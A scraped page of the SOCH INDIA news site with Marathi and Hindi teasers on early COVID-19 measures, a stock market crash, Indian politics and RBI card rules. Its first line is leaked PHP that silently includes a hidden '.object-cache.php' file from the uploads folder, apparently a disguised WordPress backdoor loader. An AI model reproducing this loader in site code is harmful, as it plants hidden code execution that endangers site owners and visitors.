add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

देश
राज्यभरातील कोरोनाचा वाढता प्रादुर्भाव लक्षात घेता सरकारी कार्यालयांमधील बायोमेट्रिक प्रणालीचा वापर बंद करण्याचा निर्णय घेण्यात आला आहे. राज्य शासनाकडून सोमवारी यासंदर्भातील परिपत्रक जारी करण्यात आले. त्यामुळे उद्यापासून सरकारी कर्मचाऱ्यांना हजेरी पटावर उपस्थिती नोंदवावी लागणार आहे. गेल्या आठवडाभरात देश आणि राज्यातील कोरोनाग्रस्तांची संख्या झपाट्याने वाढत आहे. या पार्श्वभूमीवर केंद्र आणि राज्य सरकारकडून खबरदारीचे उपाय योजले जात आहेत. महाराष्ट्रात आतापर्यंत कोरोनाचे ३८ रुग्ण आढळून आले आहेत. सोमवारी राज्यभरात कोरोनाचे पाच नवे रुग्ण आढळून आले. यापैकी यवताळमध्ये एक, मुंबईत तीन आणि नवी मुंबईतील एका रुग्णाचा समावेश आहे. राज्यातील १० शहरांमध्ये कोरोनाग्रस्त रुग्ण आढळले आहेत.

राज्यभरातील कोरोनाचा वाढता प्रादुर्भाव लक्षात घेता सरकारी कार्यालयांमधील बायोमेट्रिक प्रणालीचा वापर बंद करण्याचा निर्णय घेण्यात आला आहे. राज्य शासनाकडून सोमवारी यासंदर्भातील परिपत्रक जारी करण्यात आले. त्यामुळे उद्यापासून सरकारी कर्मचाऱ्यांना हजेरी पटावर उपस्थिती नोंदवावी लागणार आहे. गेल्या आठवडाभरात देश आणि राज्यातील कोरोनाग्रस्तांची संख्या झपाट्याने वाढत आहे. या पार्श्वभूमीवर केंद्र आणि...

Read More

सकाळीच शेअर बाजार उघडताना सुरु असलेली पडझड दिवसभर कायम राहिली आहे. दुपारनंतर पुन्हा एकदा सेन्सेक्स २८०० अंकांनी कोसळला. त्यामुळे केवळ १५ मिनिटांत गुंतवणूकदारांचे तब्बल सहा लाख कोटींचे नुकसान झाल्याचे अर्थतज्ज्ञांचे म्हणणे आहे. दुपारनंतर शेअर बाजारात पुन्हा मोठी पडझड झाली. सेन्सेक्स २८०१.०७ अंकांनी कोसळत ३१,३०२.४१ वर पोहोचला. तर निफ्टी ७५७.८०...

Read More

दुनिया को परेशान करने वाले कोरोना वायरस (Corona Virus) से जंग लड़ने के लिए पीएम नरेंद्र मोदी (PM Narendra Modi) ने रविवार को वीडियो कॉन्फ्रेंसिंग के जरिए सार्क (SAARC) देशों के साथ बातचीत की. उन्होंने सार्क देशों को कोविड-19 इमर्जेंसी फंड बनाने का सुझाव दिया और भारत की तरफ...

Read More

कांग्रेस के पूर्व अध्यक्ष राहुल गांधी सोमवार को आंकड़ों के जाल में उलझते नजर आए. उन्होंने लोकसभा में बैंक संकट का मामला उठाया और सरकार को घेरते हुए 50 डिफॉल्टर के नामों की जानकारी मांगी. एक ओर जहां उन्होंने लोकसभा में 50 डिफॉल्टर की जानकारी मांगी तो वहीं संसद...

Read More

राज्यातील महापालिका, नगरपालिका आणि नगर पंचायत क्षेत्रांबरोबरच त्यांच्या हद्दीलगतच्या गावांतील खासगी शाळा, महाविद्यालये, खासगी शिकवण्या, प्रशिक्षण केंद्रे ३१ मार्चपर्यंत बंद ठेवण्याच येतील, असे शासनाने स्पष्ट केले आहे. करोना विषाणूचा प्रादुर्भाव रोखण्यासाठी महापालिका, नगरपालिका आणि नगर पंचायत हद्दीतील शिक्षण संस्थांना सुट्टी देण्याचे आदेश शासनाने शनिवारी दिले होते. तांत्रिकदृष्टय़ा शहरे किंवा...

Read More

जगात कोरोना व्हायरसचा धसका घेतला गेला आहे. चीनमधून प्रसारित झालेला कोरोना व्हायरस जगभरात पसरला आहे. लाखोंच्या घरात कोरोना लागण झालेले आढळून आले आहेत. तर जगभरात आतापर्यंत पाच हजारांपेक्षा जास्त बळी गेले आहेत. कोरोनाचा परिणाम हा अनेक देशांच्या अर्थव्यवस्थेवर झाला आहे. कोरोनाच्या वाढत्या प्रादुर्भावामुळे अमेरिकेच्या अर्थव्यवस्थेवर मोठा परिणाम दिसून येत...

Read More

मध्य प्रदेशात कमलनाथ सरकार अल्पमतात आले आहे. त्यामुळे भारतीय जनता पक्षाच्या बहुमच चाचणीची मागणी करण्यात आली. मध्य प्रदेशात राज्यपाल लालजी टंडन यांनी कमलनाथ सरकारला बहुमत चाचणी घेण्याचे आदेश दिले होते. दरम्यान, विरोधी पक्ष भाजपच्या सदस्यांनी गोंधळ घातल्याने अर्थसंकल्पीय अधिवेशन १० दिवसांसाठी स्थगित करण्यात आले आहे. आता अधिवेशन २६ मार्चपर्यंत...

Read More

ATM Card आणि Credit Card ला अधिक सुरक्षित बनवण्यासाठी रिझर्व्ह बँकेद्वारे नवीन नियम घोषित करण्यात आले आहेत. 16 मार्च म्हणजे आजपासून हे नियम लागू होणार आहेत. अशातच तुम्ही आज एटीएम कार्ड आणि क्रेडिट कार्ड घेतलं असेल किंवा घेण्याचा विचार करत असाल तर काही गोष्टी लक्षात ठेवणं अत्यंत गरजेचं आहे....

Read More

करिना कपूर खानच्या इन्स्टाग्राम एण्ट्री नंतर शाहरुख खानची मुलगी सुहाना खाननेही तिचं इन्स्टाग्राम अकाउंट पब्लिक केलं. याच आठवड्यात सुहाना खानच्या अकाउंटवर ब्ल्यू टीकही आली. सुहानाचे अनेक फोटो आणि व्हिडिओ सोशल मीडियावर व्हायरल होत असतात. नुकतेच आता तिचे करोनाशी निगडीत काही फोटो व्हायरल होत आहेत. सुहानानेच शेअर केले फोटो सध्या...

Read More